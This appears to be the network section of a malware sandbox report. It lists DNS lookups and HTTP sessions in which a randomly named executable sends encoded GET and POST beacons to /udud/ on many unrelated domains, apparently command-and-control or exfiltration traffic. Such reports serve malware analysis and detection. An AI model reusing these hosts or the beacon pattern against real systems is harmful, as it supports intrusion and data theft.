                                                                                                May 27, 2024 12:30:45.620655060 CEST1.1.1.1192.168.11.300x9d98No error (0)drive.google.com142.251.16.139A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:30:45.620655060 CEST1.1.1.1192.168.11.300x9d98No error (0)drive.google.com142.251.16.102A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:30:45.620655060 CEST1.1.1.1192.168.11.300x9d98No error (0)drive.google.com142.251.16.138A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:30:46.233309984 CEST1.1.1.1192.168.11.300x1c0aNo error (0)drive.usercontent.google.com172.253.62.132A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:31:16.472201109 CEST1.1.1.1192.168.11.300xa112No error (0)www.fivetownsjcc.comfivetownsjcc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:31:16.472201109 CEST1.1.1.1192.168.11.300xa112No error (0)fivetownsjcc.com208.112.85.150A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:31:32.378120899 CEST1.1.1.1192.168.11.300xd434No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:31:46.244266033 CEST1.1.1.1192.168.11.300xb0e6No error (0)www.donantedeovulos.space64.190.62.22A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.119860888 CEST1.1.1.1192.168.11.300x3ae2No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.119860888 CEST1.1.1.1192.168.11.300x3ae2No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.119860888 CEST1.1.1.1192.168.11.300x3ae2No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.119860888 CEST1.1.1.1192.168.11.300x3ae2No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.588912964 CEST9.9.9.9192.168.11.300x3ae2No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.588912964 CEST9.9.9.9192.168.11.300x3ae2No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.588912964 CEST9.9.9.9192.168.11.300x3ae2No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.588912964 CEST9.9.9.9192.168.11.300x3ae2No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:15.194726944 CEST1.1.1.1192.168.11.300x8f78Name error (3)www.cookedatthebottom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:23.599452972 CEST1.1.1.1192.168.11.300x89efNo error (0)www.funtechie.top203.161.49.193A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:37.175703049 CEST1.1.1.1192.168.11.300xd9c8No error (0)www.l7aeh.us91.195.240.123A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:52.254142046 CEST1.1.1.1192.168.11.300x309aNo error (0)www.grimfilm.co.krgrimfilm.co.krCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:32:52.254142046 CEST1.1.1.1192.168.11.300x309aNo error (0)grimfilm.co.kr183.111.161.243A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:06.778337002 CEST1.1.1.1192.168.11.300x943bNo error (0)www.mindfreak.live3.64.163.50A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:20.599090099 CEST1.1.1.1192.168.11.300xd11aName error (3)www.ntt.creditcardnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:29.165936947 CEST1.1.1.1192.168.11.300x3bfcNo error (0)www.avocatmh.orgwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:33:29.165936947 CEST1.1.1.1192.168.11.300x3bfcNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:42.803524017 CEST1.1.1.1192.168.11.300x942bNo error (0)www.lm2ue.us91.195.240.123A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:56.816781044 CEST1.1.1.1192.168.11.300x3f70No error (0)www.noispisok.comnoispisok.comCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:33:56.816781044 CEST1.1.1.1192.168.11.300x3f70No error (0)noispisok.com84.32.84.32A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:10.568295956 CEST1.1.1.1192.168.11.300x37d4No error (0)www.578tt67.comgly.gly301payr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:34:10.568295956 CEST1.1.1.1192.168.11.300x37d4No error (0)gly.gly301payr.com162.209.189.152A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:10.568295956 CEST1.1.1.1192.168.11.300x37d4No error (0)gly.gly301payr.com162.209.189.153A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:10.568295956 CEST1.1.1.1192.168.11.300x37d4No error (0)gly.gly301payr.com162.209.189.151A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:24.560374975 CEST1.1.1.1192.168.11.300x9e5cNo error (0)www.uhahiq.coma258paw.yb550.comCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:34:24.560374975 CEST1.1.1.1192.168.11.300x9e5cNo error (0)a258paw.yb550.com147.92.36.247A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:38.884800911 CEST1.1.1.1192.168.11.300x1c21Name error (3)www.weave.gamenonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:35:36.740489960 CEST1.1.1.1192.168.11.300x68a6Name error (3)www.cookedatthebottom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:36:40.111711025 CEST1.1.1.1192.168.11.300xc6fName error (3)www.ntt.creditcardnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:36:48.574687004 CEST1.1.1.1192.168.11.300x7fbeNo error (0)www.wp-bits.online116.203.164.244A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:02.781204939 CEST1.1.1.1192.168.11.300x2d39No error (0)www.academynadpo.ruacademynadpo.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:37:02.781204939 CEST1.1.1.1192.168.11.300x2d39No error (0)academynadpo.ru185.215.4.19A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:16.251353979 CEST1.1.1.1192.168.11.300x9612Name error (3)www.quantumpowerlife.comnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:37.795667887 CEST1.1.1.1192.168.11.300xc49bNo error (0)www.osbornesargent.co.ukosbornesargent.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                May 27, 2024 12:37:37.795667887 CEST1.1.1.1192.168.11.300xc49bNo error (0)osbornesargent.co.uk76.223.67.189A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:37.795667887 CEST1.1.1.1192.168.11.300xc49bNo error (0)osbornesargent.co.uk13.248.213.45A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:51.457040071 CEST1.1.1.1192.168.11.300xf45eName error (3)www.4-94.productionsnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:38:18.736293077 CEST1.1.1.1192.168.11.300x3318Name error (3)www.cookedatthebottom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:38:46.162926912 CEST1.1.1.1192.168.11.300x60d0Name error (3)www.ntt.creditcardnonenoneA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:38:58.812975883 CEST1.1.1.1192.168.11.300x4b92No error (0)www.gast.com.pl185.253.215.17A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:39:04.373385906 CEST1.1.1.1192.168.11.300x98f7No error (0)www.gaglianoart.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:39:20.469120979 CEST1.1.1.1192.168.11.300x3e3eName error (3)www.cookedatthebottom.comnonenoneA (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • drive.google.com
                                                                                                • drive.usercontent.google.com
                                                                                                • www.fivetownsjcc.com
                                                                                                • www.maxiwalls.com
                                                                                                • www.donantedeovulos.space
                                                                                                • www.valentinaetommaso.it
                                                                                                • www.funtechie.top
                                                                                                • www.l7aeh.us
                                                                                                • www.grimfilm.co.kr
                                                                                                • www.mindfreak.live
                                                                                                • www.avocatmh.org
                                                                                                • www.lm2ue.us
                                                                                                • www.noispisok.com
                                                                                                • www.uhahiq.com
                                                                                                • www.wp-bits.online
                                                                                                • www.academynadpo.ru
                                                                                                • www.gaglianoart.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.11.3049829208.112.85.150807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:31:16.583331108 CEST481OUTGET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:31:16.689500093 CEST383INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:30:56 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.11.304983179.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:31:32.596218109 CEST742OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 55 41 42 31 62 33 38 31 41 32 70 45 61 2b 6f 33 68 75 47 54 36 62 78 50 52 67 55 52 4d 66 71 55 66 76 4b 63 6c 69 69 4d 68 36 62 30 42 4c 59 35 4f 36 34 45 73 73 55 64 4b 6e 4e 50 46 66 42 77 72 45 41 64 6e 6d 75 55 6c 33 6c 6a 67 51 6e 35 46 37 43 48 37 52 64 31 70 44 64 49 2f 78 32 58 39 36 6b 57 43 78 4b 32 32 6f 32 46 74 65 32 48 66 4d 31 2b 47 6d 72 38 61 79 43 58 6f 49 7a 75 7a 6c 38 61 32 73 47 4d 72 51 74 49 30 71 69 74 73 6d 58 45 44 4a 65 75 31 44 5a 53 63 74 77 30 52 44 4f 76 4c 2b 51 43 37 6f 4f 33 47 4a 4f 4f 42 78 48 79 34 41 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==
                                                                                                May 27, 2024 12:31:32.811263084 CEST363INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:31:32 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.11.304983279.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:31:35.330244064 CEST762OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 57 67 78 31 61 55 55 31 48 57 70 44 57 65 6f 33 72 4f 47 58 36 62 39 50 52 68 41 42 50 74 4f 55 47 50 36 63 33 51 4b 4d 69 36 62 30 4f 72 59 67 51 4b 34 54 73 72 63 56 4b 6a 46 50 46 66 56 77 72 46 77 64 6e 57 53 56 6c 6e 6c 68 37 67 6e 33 61 4c 43 48 37 52 64 31 70 44 49 6c 2f 78 75 58 2b 4b 55 57 45 51 4b 78 37 49 32 4b 36 75 32 48 4a 38 30 33 47 6d 72 4b 61 7a 65 39 6f 4b 37 75 7a 6b 4d 61 31 35 36 4e 69 51 74 53 37 4b 6a 50 6b 6d 71 7a 4e 71 43 46 38 42 39 79 53 70 63 2f 64 30 2f 31 57 39 6b 41 6f 49 79 61 61 49 6a 6d 44 7a 47 70 6c 4d 65 57 6a 47 44 41 59 49 65 55 46 53 53 4f 6d 56 39 35 4a 66 34 3d
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtOUGP6c3QKMi6b0OrYgQK4TsrcVKjFPFfVwrFwdnWSVlnlh7gn3aLCH7Rd1pDIl/xuX+KUWEQKx7I2K6u2HJ803GmrKaze9oK7uzkMa156NiQtS7KjPkmqzNqCF8B9ySpc/d0/1W9kAoIyaaIjmDzGplMeWjGDAYIeUFSSOmV95Jf4=
                                                                                                May 27, 2024 12:31:35.543741941 CEST363INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:31:35 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.11.304983379.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:31:38.065912962 CEST1679OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 57 67 78 31 61 55 55 31 48 57 70 44 57 65 6f 33 72 4f 47 58 36 62 39 50 52 68 41 42 50 74 47 55 61 75 61 63 6c 47 43 4d 73 61 62 30 48 4c 59 6c 51 4b 34 53 73 71 34 52 4b 6a 4a 78 46 63 74 77 74 6e 34 64 68 6c 4b 56 75 6e 6c 68 6b 51 6e 36 46 37 43 6f 37 56 78 35 70 44 59 6c 2f 78 75 58 2b 4d 59 57 48 42 4b 78 6f 59 32 46 74 65 32 54 66 4d 31 53 47 6d 7a 61 61 7a 62 49 6f 61 62 75 79 45 63 61 6d 37 53 4e 74 51 74 55 34 4b 6a 70 6b 6d 6d 73 4e 71 65 4a 38 41 35 49 53 76 73 2f 4f 46 36 65 48 73 73 48 30 35 4f 33 57 38 6e 59 53 43 79 68 74 38 65 47 6b 56 2f 58 51 37 69 36 4c 6e 4b 37 31 58 42 4d 4c 72 39 68 5a 55 63 56 50 51 71 41 71 6e 37 32 51 73 67 57 4b 2b 52 73 76 4c 58 4c 61 76 36 6e 66 4d 66 43 66 35 2b 73 5a 63 2f 52 4f 54 36 56 43 43 78 47 65 61 61 51 50 58 58 67 48 41 75 43 41 55 4b 73 66 36 65 51 42 45 66 45 53 30 75 6b 68 70 6b 4b 58 44 4c 61 78 65 72 79 73 43 55 74 4d 2b 57 43 51 52 67 74 36 68 37 68 7a 63 53 33 32 67 4a 72 44 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtGUauaclGCMsab0HLYlQK4Ssq4RKjJxFctwtn4dhlKVunlhkQn6F7Co7Vx5pDYl/xuX+MYWHBKxoY2Fte2TfM1SGmzaazbIoabuyEcam7SNtQtU4KjpkmmsNqeJ8A5ISvs/OF6eHssH05O3W8nYSCyht8eGkV/XQ7i6LnK71XBMLr9hZUcVPQqAqn72QsgWK+RsvLXLav6nfMfCf5+sZc/ROT6VCCxGeaaQPXXgHAuCAUKsf6eQBEfES0ukhpkKXDLaxerysCUtM+WCQRgt6h7hzcS32gJrDwHD2j5or4ms06gjMs1UgIooI9mIgZiJJKXJRriX6/DXqLg2MurzgH7jqldXIybfs5vzanwPTf7gIpjHnvy0WcGQoQ+4o+zER1DQDBOpEHui7ZY7mhVY8UcFavs7CJll27jiI1qVOhbvnn9ZpaHmiv7sh97tOQPDvA3BS/vJ9qhZHM+tmYw0/i0DvDkEPpwDx0/vMzA17AUstzehgqtMl03mmGPbhqHCHVidhoAqsNGCFo/0aQECnWLnQS3Q5zOQhJhzPn3NteRiuS2LGTa0DjSj3iDlTw/Zx9fSOycX4WnooNvgSEpZLEl49KNldbP4GKGmiFI64q1Q+dHwKtf3/WnRRvJaYSao8kmIqv+C/l0ju322eNUPauoBj/DEcFlh1FkA81pBJzz3T71CXZ8zqHB/Y4Yl0uAKrBKd22vmZiaapqx/jRem/xULkONx5IgHIS3TkyLu0ExnUNH+6n9dh9SzB3I/SYbK5/rm/9Uc86++uhgYJ2pCwimdb1gK7CUNIkDNjooUlr1a2uceMznEJ42tzkCzrk4OwF/G8FZVf/O/2io0WctzD/hDzXoe8nOZoe59yateOEcKDCICCPs4KxzdbhS9684L4GzjEJP8ulzAgd3LubN+o0IRjeQiBjPLnB97H8GrkkXgV9cotNTUYodrdNmIFLngn27 [TRUNCATED]
                                                                                                May 27, 2024 12:31:38.280848980 CEST363INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:31:38 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.11.304983479.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:31:40.814068079 CEST478OUTGET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:31:41.028924942 CEST1289INHTTP/1.1 200 OK
                                                                                                Date: Mon, 27 May 2024 10:31:40 GMT
                                                                                                Server: Apache
                                                                                                Cache-control: max-age=300
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Length: 5662
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c [TRUNCATED]
